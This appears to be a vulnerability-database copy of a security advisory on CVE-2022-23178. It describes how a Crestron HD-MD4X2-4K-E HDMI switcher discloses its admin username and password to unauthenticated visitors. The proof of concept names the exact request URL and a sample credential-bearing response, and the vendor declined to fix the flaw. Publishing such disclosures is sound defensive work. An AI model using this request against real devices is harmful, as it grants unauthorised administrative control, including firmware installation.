Creston Web Interface 1.0.0.2159 - Credential Disclosure

🗓️ 18 Jan 2022 00:00:00Reported by RedTeam Pentesting GmbHType

exploitdb🔗 www.exploit-db.com👁 334 Views

Credential Disclosure in Crestron HD-MD4X2-4K-

Reporter	Title	Published	Views	Family All 14
0day.today	Crestron HD-MD4X2-4K-E 1.0.0.2159 Credential Disclosure Vulnerability	13 Jan 202200:00	–	zdt
0day.today	Creston Web Interface 1.0.0.2159 - Credential Disclosure Vulnerability	18 Jan 202200:00	–	zdt
ATTACKERKB	CVE-2022-23178	15 Jan 202215:17	–	attackerkb
Circl	CVE-2022-23178	15 Jan 202218:50	–	circl
CNNVD	Crestron Hd-Md4X2-4K-E 授权问题漏洞	12 Jan 202200:00	–	cnnvd
CVE	CVE-2022-23178	15 Jan 202214:40	–	cve
Cvelist	CVE-2022-23178	15 Jan 202214:40	–	cvelist
Nuclei	Crestron Device - Credentials Disclosure	6 Jun 202603:01	–	nuclei
NVD	CVE-2022-23178	15 Jan 202215:17	–	nvd
Packet Storm	Crestron HD-MD4X2-4K-E 1.0.0.2159 Credential Disclosure	12 Jan 202200:00	–	packetstorm

# Exploit Title: Creston Web Interface 1.0.0.2159 - Credential Disclosure
# Exploit Author: RedTeam Pentesting GmbH

Advisory: Credential Disclosure in Web Interface of Crestron Device


When the administrative web interface of the Crestron HDMI switcher is
accessed unauthenticated, user credentials are disclosed which are valid
to authenticate to the web interface.

Details
=======

Product: Crestron HD-MD4X2-4K-E
Affected Versions: 1.0.0.2159
Fixed Versions: -
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009
Advisory Status: published
CVE: CVE-2022-23178
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178


Introduction
============

"Crestron sets the gold standard for network security by leveraging the
most advanced technologies including 802.1x authentication, AES
encryption, Active Directory® credential management, JITC Certification,
SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to
provide network security at the product level."

(from the vendor's homepage)


More Details
============

Upon visiting the device's web interface using a web browser, a login
form is displayed requiring to enter username and password to
authenticate. The analysis of sent HTTP traffic revealed that in
addition to the loading of the website, a few more HTTP requests are
automatically triggered. One of the associated responses contains a
username and a password which can be used to authenticate as the
affected user.


Proof of Concept
================

Requesting the URL "http://crestron.example.com/" via a web browser
results in multiple HTTP requests being sent. Among others, the
following URL is requested:

------------------------------------------------------------------------
http://crestron.example.com/aj.html?a=devi&_=[...]
------------------------------------------------------------------------

This request results in a response similar to the following:

------------------------------------------------------------------------
HTTP/1.0 200 OK
Cache-Control: no-cache
Content-type: text/html

{
  "login_ur": 0,
  "front_val": [
    0,
    1
  ],
  "uname": "admin",
  "upassword": "password"
}
------------------------------------------------------------------------

The values for the keys "uname" and "upassword" could be used to
successfully authenticate to the web interface as the affected user.


Workaround
==========

Reachability over the network can be restricted for access to the web
interface, for example by using a firewall.


Fix
===

No fix known.


Security Risk
=============

As user credentials are disclosed to visitors of the web interface they
can directly be used to authenticate to it. The access allows to modify
the device's input and output settings as well as to upload and install
new firmware. Due to ease of exploitation and gain of administrative
access this vulnerability poses a high risk.


Timeline
========

2021-10-06 Vulnerability identified
2021-11-15 Customer approved disclosure to vendor
2021-12-08 Vendor notified
2021-12-15 Vendor notified again
2021-12-21 Vendor response received: "The device in question doesn't support
           Crestron's security practices. We recommend the HD-MD-4KZ alternative."
2021-12-22 Requested confirmation, that the vulnerability will not be addressed.
2021-12-28 Vendor confirms that the vulnerability will not be corrected.
2022-01-12 Advisory released



RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/


-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen

18 Jan 2022 00:00Current

9.7High risk

Vulners AI Score9.7

CVSS 3.19.8

CVSS 210

EPSS0.92106